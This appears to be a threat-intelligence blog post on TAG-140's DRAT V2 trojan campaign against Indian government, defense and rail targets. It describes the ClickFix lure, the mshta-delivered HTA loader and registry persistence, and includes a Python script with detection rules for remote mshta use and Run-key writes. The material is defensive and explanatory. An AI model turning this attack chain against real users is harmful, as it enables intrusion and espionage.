
Inside the TAG-140 DRAT V2 Campaign: How Evolving RATs Threaten Indian Government, Defense, and Rail Sectors

Cybersecurity threats are evolving at breakneck speed—and nowhere is this more evident than in the latest campaign unleashed by TAG-140. With a newly weaponized Remote Access Trojan (RAT) called DRAT V2, this elusive group is setting its sights on India’s most critical sectors: government, defense, and railways. If you’re wondering how these attacks work, who TAG-140 really is, and what this means for cybersecurity in the region, you’re in the right place. Let’s break down what you need to know about the DRAT V2 threat, how it operates, and what organizations should do to stay a step ahead.


Why Should You Care About TAG-140 and DRAT V2?

Cyberattacks are no longer just about stealing data—they’re about disrupting entire national infrastructures. When a threat actor like TAG-140 upgrades its arsenal and shifts its targets, everyone from government officials to IT administrators and regular citizens has a stake in the outcome.

Here’s why it matters:

  • National Security: Targeting government and defense opens doors to espionage, sabotage, and the leaking of sensitive information.
  • Economic Impact: Attacks on rail and oil & gas sectors can disrupt transportation, energy, and commerce.
  • Personal Privacy: When critical systems are compromised, citizens’ data and daily lives can be affected.

Let’s dig deeper into this campaign, so you can understand the risks and the evolving playbook of modern cyber adversaries.


Who is TAG-140? Unraveling the Mystery Behind the Hackers

TAG-140 isn’t a household name—yet. But within the cybersecurity community, this group has earned a reputation as one of the most persistent and innovative Advanced Persistent Threats (APTs) in South Asia.

Key Facts About TAG-140

  • Attribution: Linked to SideCopy and Transparent Tribe (APT36), groups with a storied history of targeting Indian interests. For background, see MITRE ATT&CK APT36.
  • Ties Beyond Pakistan: While often associated with Pakistan, TAG-140 exhibits operational practices and malware development that suggest a broader network or influence.
  • Not New to the Scene: TAG-140 has been active since at least 2019, steadily refining its tactics and diversifying its targets.

Bottom line: TAG-140 represents the cutting edge of state-sponsored cyber espionage and sabotage, with a special focus on Indian sectors.


DRAT V2: The Latest Weapon in TAG-140’s Arsenal

What is DRAT V2?

DRAT V2 is a modified, more dangerous version of the original DRAT remote access trojan. It’s the latest addition to an ever-expanding suite of RATs used by TAG-140 and its affiliates. These tools are designed to infiltrate computers, maintain persistence, exfiltrate sensitive data, and even enable remote control for further attacks.

How Does DRAT V2 Stand Out?

DRAT V2 isn’t just a simple upgrade—it’s a calculated evolution. Let’s break down the unique features that make it both effective and challenging to defend against:

  • New Command Functionality: DRAT V2 adds the ability to execute arbitrary shell commands, enabling flexible post-exploitation actions.
  • Obfuscated Communication: It uses Base64 encoding to obscure command-and-control (C2) IP addresses, complicating network detection.
  • Protocol Upgrade: Supports both ASCII and Unicode command inputs (but replies in ASCII), expanding compatibility and stealth.
  • Reduced String Obfuscation: By leaving more command headers in plaintext, it prioritizes reliable parsing over hiding its tracks.
  • Basic Persistence: Relies chiefly on Windows Registry modifications for persistence rather than advanced anti-analysis techniques.

Why does that matter? These changes show TAG-140 is more concerned with operational reliability and rapid deployment across many targets than with advanced evasion—likely because their social engineering and delivery are already effective.


How TAG-140 Delivers DRAT V2: The Anatomy of an Attack

Let’s walk through the attack chain so you can see exactly how DRAT V2 sneaks onto targeted systems.

Step 1: Spoofed Indian Ministry of Defence Portal

The attackers craft a near-perfect clone of the official Indian Ministry of Defence press release portal. This credible decoy lures in victims—typically government or defense staff—who trust the source.

Step 2: The ClickFix Trick

Here’s where social engineering meets technical trickery. The fake portal contains a single active link. Clicking it:

  • Copies a malicious command to the clipboard.
  • Prompts the victim to paste and run it in their command shell.

This approach leverages human trust and curiosity—a simple yet effective method.

Step 3: The HTA File Dropper

When the victim executes the copied command:

  • Their machine reaches out to a remote server (trade4wealth[.]in) to download an HTML Application (.hta) file.
  • This file is run using mshta.exe, a legitimate Windows tool.
  • The HTA file launches a loader known as “BroaderAspect.”

Step 4: Loader Actions and DRAT V2 Deployment

What does BroaderAspect do?

  • Downloads and opens a decoy PDF (to distract the victim).
  • Sets up persistence via Windows Registry changes.
  • Fetches and executes DRAT V2 from the same malicious server.

Step 5: DRAT V2 Takes Over

Once installed, DRAT V2 establishes a connection back to the attackers’ C2 infrastructure, ready to receive commands and exfiltrate data.


What Makes DRAT V2 Dangerous?

Let’s talk impact. Once DRAT V2 is running on a system, TAG-140 can:

  • Collect reconnaissance data (system info, network configuration).
  • Upload additional malware payloads.
  • Exfiltrate sensitive documents and credentials.
  • Maintain persistent, flexible control for ongoing espionage or sabotage.

With the addition of shell command execution, the attacker’s options expand from simple surveillance to full system manipulation.

Here’s why that’s alarming: In highly sensitive sectors like defense or railways, this could mean anything from stolen confidential plans to disruption of critical operations.


The Expanding Scope: Beyond Government to Railways, Oil, and More

TAG-140’s operations aren’t standing still. According to research from Recorded Future, the group has widened its net considerably.

Recent Targets Include:

  • Railway networks
  • Oil & gas companies
  • External affairs ministries
  • Maritime and academic sectors

This shift signals a move from pure espionage toward attacks that could disrupt infrastructure, undermine public trust, or even cause physical consequences if critical systems are tampered with.


Why Does TAG-140 Rotate RATs and Techniques?

If you’re wondering, “Why develop so many RATs?” you’re not alone. TAG-140’s ever-rotating toolkit—including Action RAT, AllaKore RAT, ReverseRAT, Spark RAT, and more—serves a tactical purpose:

  • Complicates Attribution: Rotating tools muddy the forensic waters, making it harder for defenders to pin attacks on a specific group.
  • Evades Detection: New and tweaked malware variants slip past traditional security solutions.
  • Maintains Flexibility: If one tool is detected and blocked, another is ready to deploy.

The upshot? TAG-140 is playing a long game, prioritizing operational continuity over any single campaign’s stealth.


APT36 and Coordinated Attacks During India-Pakistan Tensions

The backdrop to these campaigns is heightened geopolitical tension. During the India-Pakistan conflict in May 2025, state-sponsored activity and hacktivism surged.

What Did This Look Like?

  • APT36 (Transparent Tribe) and SideCopy both ramped up their efforts.
  • Delivery of Ares RAT and new malware such as DISGOMOJI.
  • Phishing emails with malicious PDFs targeted defense, government, IT, healthcare, education, and telecom sectors.
  • Focused on remote access, surveillance, and potential disruption of critical services.

These coordinated campaigns serve as a stark reminder: Cyberspace is a frontline in modern international conflicts.


Defense Strategies: How Organizations Can Respond

So, what can Indian organizations—and any entity in the crosshairs of state-sponsored threat groups—do to defend themselves?

1. Employee Awareness and Training

  • Simulate phishing and social engineering attacks regularly.
  • Teach users to recognize spoofed login portals and suspicious prompts.
  • Encourage a “zero trust” approach to unexpected requests—even from familiar-looking sources.

2. Patch and Harden Systems

  • Keep all software up to date, especially Windows OS and security tools.
  • Disable or tightly control execution of scripting engines like mshta.exe where possible.

3. Enhanced Detection and Response

  • Behavioral monitoring: Look for telltale signs like new registry persistence entries or clipboard manipulation.
  • Use threat intelligence feeds to stay updated on new IOCs (Indicators of Compromise) and RAT variants.
  • Static and dynamic analysis: Regularly scan for both known and anomalous malware behavior.
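The attack chain described in Steps 2 to 4 (a pasted command launching mshta.exe against a remote HTA, followed by a loader writing Run-key persistence) and the behavioral-monitoring bullet above both point at the same telemetry: process-creation and registry-value events. The Python below is an added example, not code from the article or the research it summarizes, and runs three detection rules over a constructed batch of Sysmon-style events. Event field names, file paths, the SID, the hostname and the registry value names are all illustrative placeholders, not campaign indicators.

```python
import re

# Constructed Sysmon-style events: EventID 1 = process creation, EventID 13 =
# registry value set. Paths, the SID, the hostname and value names are
# illustrative placeholders, not indicators from the TAG-140 campaign.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},
    # ClickFix shape: a shell the user opened launches mshta.exe with a remote URL
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta.exe https://update.example.invalid/notice.hta"},
    # Loader behaviour: the script host writes a Run value pointing into the user profile
    {"id": 13, "image": r"C:\Windows\System32\mshta.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\alice\AppData\Roaming\svc\updater.exe"},
    # Benign: an installer registers an agent that lives under Program Files
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "details": r"C:\Program Files\Vendor\agent.exe"},
    # Admin opening a local HTA from Explorer: worth a low-severity record only
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": r"mshta.exe C:\tools\local.hta"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, for image/parent comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: dict):
    """Apply the rules to one event; return a list of (severity, rule_name)."""
    alerts = []
    if event["id"] == 1 and basename(event["image"]) == "mshta.exe":
        if URL_RE.search(event["cmdline"]):
            alerts.append(("high", "mshta_remote_hta"))       # HTA fetched from the network
        elif basename(event["parent"]) in SHELLS:
            alerts.append(("medium", "mshta_from_shell"))     # typed or pasted into a shell
        else:
            alerts.append(("low", "mshta_execution"))         # audit trail for every use
    elif event["id"] == 13 and RUN_KEY_RE.search(event["target"]):
        if basename(event["image"]) in SCRIPT_HOSTS:
            alerts.append(("high", "run_key_set_by_script_host"))
        if USER_WRITABLE_RE.search(event["details"]):
            alerts.append(("high", "run_key_user_writable_path"))
        if not alerts:
            alerts.append(("low", "run_key_modified"))
    return alerts


def scan(events):
    """Return (event_index, severity, rule_name) for every alert across the batch."""
    return [(i, sev, rule) for i, ev in enumerate(events) for sev, rule in evaluate(ev)]


if __name__ == "__main__":
    for idx, sev, rule in scan(SAMPLE_EVENTS):
        print(f"[{sev:6}] event {idx}: {rule}")
```

The severities encode the article's own point: mshta.exe is a legitimate Windows tool, so every execution is recorded at low severity, while a remote URL on its command line, or a script host writing a Run value that points into a user-writable directory, is escalated to high because that combination matches the chain described above rather than ordinary administration.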

4. Segmentation and Access Controls

  • Limit user privileges—don’t let ordinary accounts run shell commands or install software.
  • Segregate networks handling critical data or infrastructure from the rest of the organization.

5. Incident Response Planning

  • Prepare for the worst. Have clear protocols for isolation, investigation, and recovery when a breach occurs.
  • Regularly update plans to reflect new attack vectors like those used by TAG-140.

For more best practices, see the cybersecurity guidelines published by CERT-In (the Indian Computer Emergency Response Team).


Lessons from the DRAT V2 Campaign: What’s Next for Indian Cybersecurity?

The DRAT V2 campaign is a clear sign that Indian critical sectors are under sustained, evolving threat from sophisticated cyber adversaries. The playbook is changing—faster than many organizations realize.

Key Takeaways

  • Adaptation is the norm: TAG-140’s frequent tool rotation means defenders must get comfortable with rapid change.
  • Social engineering is effective: Even the best systems can be undermined by a well-crafted phishing campaign.
  • Collaboration is vital: Government, private sector, and international partners need to share intelligence and response strategies.

If you’re responsible for security in a targeted sector, now’s the time to revisit your defenses and invest in ongoing cybersecurity education.


Frequently Asked Questions (FAQ)

Q1: What is DRAT V2 and how does it differ from regular RATs?
A: DRAT V2 is a customized remote access trojan deployed by TAG-140. Unlike generic RATs, it includes specific features for flexible command execution, obfuscated C2 communication, and is tailored for stealth and persistence within Indian government and critical infrastructure environments.

Q2: Who is TAG-140 and are they part of APT36?
A: TAG-140 is a hacking group with operational overlaps with SideCopy and Transparent Tribe (APT36). While they share tactics and toolsets, TAG-140 is tracked as a distinct cluster, possibly with broader affiliations beyond Pakistan.

Q3: How do these attacks typically start?
A: Most attacks begin with social engineering—spoofed websites or phishing emails that trick users into executing malicious commands. This initiates the download and execution of malware like DRAT V2.

Q4: What sectors are currently being targeted?
A: Indian government, defense, railways, oil & gas, external affairs, maritime, and academic sectors have all been targeted in recent campaigns.

Q5: How can organizations defend against DRAT V2 and similar threats?
A: Key defenses include user training, patching systems, limiting script execution, continuous monitoring for suspicious behavior, and active threat intelligence sharing.

Q6: Is DRAT V2 easy to detect?
A: While DRAT V2 lacks advanced anti-analysis and uses basic persistence, its newness and obfuscated C2 can help it evade outdated security tools. Modern behavioral and threat intelligence-driven detection increases chances of catching it early.

Q7: Where can I learn more about current APT threats in India?
A: Check resources from Recorded Future, The Hacker News, and CERT-In for up-to-date reports and advisories.


Final Thoughts: Stay Informed, Stay Secure

The TAG-140 DRAT V2 campaign is just the tip of the iceberg in a rapidly shifting cyber threat landscape. As attackers adapt, so must defenders. Whether you’re a CISO, IT admin, or simply a concerned citizen, staying informed is your best defense.

Actionable Insight:
Review your organization’s current email and web filtering practices. Simulate a phishing attack using a spoofed internal portal, and see how your team responds. Use the results as a springboard for improved training and technical controls.
